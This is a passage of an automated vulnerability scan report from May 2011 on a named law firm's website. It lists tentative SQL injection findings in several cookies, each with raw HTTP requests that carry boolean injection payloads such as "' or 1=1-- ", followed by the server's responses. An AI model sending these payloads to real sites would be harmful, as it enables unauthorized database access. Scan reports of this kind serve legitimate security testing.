<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.17. http://www.pillsburylaw.com/ [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 39331056'%20or%201%3d1--%20 and 39331056'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.139331056'%20or%201%3d1--%20; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:09:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 12-May-2010 16:09:33 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.139331056'%20or%201%3d2--%20; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819578;path=/
Set-Cookie: CFTOKEN=19658861;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.18. http://www.pillsburylaw.com/ [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 20657778%20or%201%3d1--%20 and 20657778%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704620657778%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 19:52:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 12-May-2010 19:52:04 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704620657778%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:52:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-ri
...[SNIP]...

1.19. http://www.pillsburylaw.com/ [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 20149939'%20or%201%3d1--%20 and 20149939'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman20149939'%20or%201%3d1--%20; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:09:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 12-May-2010 16:09:42 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman20149939'%20or%201%3d2--%20; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819600;path=/
Set-Cookie: CFTOKEN=46396247;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.20. http://www.pillsburylaw.com/ [hsfirstvisit cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 27618018'%20or%201%3d1--%20 and 27618018'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4627618018'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:10:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Wed, 12-May-2010 16:10:31 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4627618018'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819704;path=/
Set-Cookie: CFTOKEN=62527523;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:10:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
b
...[SNIP]...

1.21. http://www.pillsburylaw.com/ [hubspotdt cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 14667953'%20or%201%3d1--%20 and 14667953'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A4114667953'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:09:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Wed, 12-May-2010 16:09:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A4114667953'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819615;path=/
Set-Cookie: CFTOKEN=31184202;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 16:09:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
